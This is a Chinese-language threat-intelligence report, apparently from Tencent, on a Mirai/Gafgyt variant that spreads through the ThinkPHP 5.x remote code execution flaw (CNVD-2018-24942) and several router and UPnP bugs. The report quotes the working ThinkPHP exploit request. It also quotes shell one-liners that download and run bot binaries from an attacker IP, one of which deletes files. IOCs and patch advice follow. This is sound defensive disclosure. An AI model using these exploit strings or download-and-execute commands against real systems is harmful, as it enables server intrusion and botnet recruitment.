Mirai蠕虫病毒变种正在利用12月公告的ThinkPHP高危漏洞(CNVD-2018-24942)传播

2019-01-17 18:08:59
近期腾讯御见威胁情报中心监测到某教育科技机构服务器遭到ThinkPHP V5* 远程代码执行漏洞攻击。发起本次攻击的病毒为参考Mirai和Gafgyt源代码的变种病毒,细节上可能与Gafgyt更近一些。

背景

近期腾讯御见威胁情报中心监测到某教育科技机构服务器遭到ThinkPHP V5* 远程代码执行漏洞攻击。发起本次攻击的病毒为参考MiraiGafgyt源代码的变种病毒,细节上可能与Gafgyt更近一些。

ThinkPHP官方在2018.12.09发布安全更新(https://blog.thinkphp.cn/869075),公布了远程命令执行的高危漏洞(CNVD-2018-24942),该漏洞主要因为php代码中route/dispatch模块没有对URL中的恶意命令进行过滤导致,在没有开启强制路由的情况下,能够造成远程命令执行,包括执行shell命令,调用php函数,写入webshell等。主要影响的版本包括 5.x < 5.1.31 5.x <= 5.0.23。黑客利用上述漏洞,可以批量入侵企业网站。

该科技教育机构的网站服务器采用ThinkPHP版本为5.1.30,属于受影响版本范围。

根据CNVD(国家信息安全漏洞共享平台)探测数据,全球使用ThinkPHP框架的服务器规模共有4.3万;按国家分布情况,位于前三的分别是中国(3.9万)、美国(4187)和加拿大(471)。

腾讯御见威胁情报中心已于2018.12.13日对该漏洞发布预警:https://mp.weixin.qq.com/s/vKejiR628Frb_-y9WzTmIQ

样本分析

分析发现攻击样本为最新的Mirai病毒变种,看国外相关资料,这类样本参考MiraiGafgyt源代码编写,细节上可能与Gafgyt更相近一些。该变种利用最新的ThinkPHP V5*远程代码执行漏洞感染x86服务器,同时利用华为路由器漏洞、友讯路由器漏洞、瑞昱upnp设备漏洞感染物联网设备。

感染成功后分别从服务器185.244.25.168下载木马x86mips植入。X86mips被植入感染设备后会针对其他机器继续发起扫描攻击,导致该木马具有自传播能力。同时受感染设备接收服务器指令执行DDoS攻击,攻击类型包括HTTPUDPTCP

漏洞攻击

针对ThinkPHPCNVD-2018-24942)漏洞攻击时构造如下POC代码,将请求发送至目标服务器:

GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp;wget http://185.244.25.168/x86;chmod 777 x86;sh x86

漏洞攻击成功后通过wget下载植入木马http://185.244.25.168/x86

针对友讯路由器漏洞扫描攻击,攻击成功后执行命令:

cd /tmp && rm -rf * &&wget http://185.244.25.168/mips && chmod +x mips;./mips

针对华为路由器漏洞扫描攻击,攻击成功后执行命令:

/bin/busybox wget -g 185.244.25.168 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei

针对瑞昱upnp设备漏洞扫描攻击,攻击成功后执行命令:

cd /var/; wget http://185.244.25.168/mips; chmod +x mips; ./mips


DDoS攻击

初始化连接服务器185.244.25.168:52

发起DDoS时具有包括HTTP TCPUDP 等协议的攻击类型。攻击的选项有多种,例如目标 IP、是否分片、每次发送的长度、是否发送随机数据等。

HTTP攻击:

UDP攻击:

TCP攻击:

Mirai病毒在2016年开始出现,通过感染可访问网络的消费级电子设备例如网络监控摄像机和家庭路由器等,以达到组建僵尸网络进行大规模网络攻击的目的。

Mirai构建的僵尸网络已经参与了几次影响广泛的大型分布式拒绝服务攻击(DDoS攻击),包括2016920日针对计算机安全撰稿人布莱恩·克莱布斯个人网站的攻击、对法国网站托管商OVH的攻击,以及201610Dyn公司网络攻击事件。

如今开发Mirai病毒的作者已经落网,但是Mirai的源代码以开源的形式发布至黑客论坛,其中的技术也已被其他一些恶意软件采用,导致其危害仍在延续。

2018.12.28日腾讯御见威胁情报中心发现利用SQL Server弱密码进行暴力入侵的病毒攻击事件,被入侵的服务器被安装暗云感染器、Mykings木马、以及Mirai病毒变种,该Mirai变种具有针对闭路电视物联网设备漏洞进行攻击的能力。此次发现的变种将最新ThinkPHP高危漏洞、多种路由器漏洞、upnp设备漏洞进行组合攻击,感染能力再次增强。

安全建议:

1、尽快更新ThinkPHP到最新版本,手动修复可参考官方说明

https://blog.thinkphp.cn/869075

2可使用腾讯御界高级威胁检测系统检测该ThinkPHP漏洞,同时可以检测利用该漏洞入侵攻击。

IOCs

IP

185.244.25.168

URL

hxxp://185.244.25.168/x86

hxxp://185.244.25.168/mips

md5

9439173a2353d9dda2da5d75e953b56f

fac15f7d9426c0e80f64cf4663d5292e


参考链接:

https://blog.thinkphp.cn/869075

https://mp.weixin.qq.com/s/vKejiR628Frb_-y9WzTmIQ

https://mp.weixin.qq.com/s/wuWKQnxQBvSvkqpK3KaE2Q

最新资讯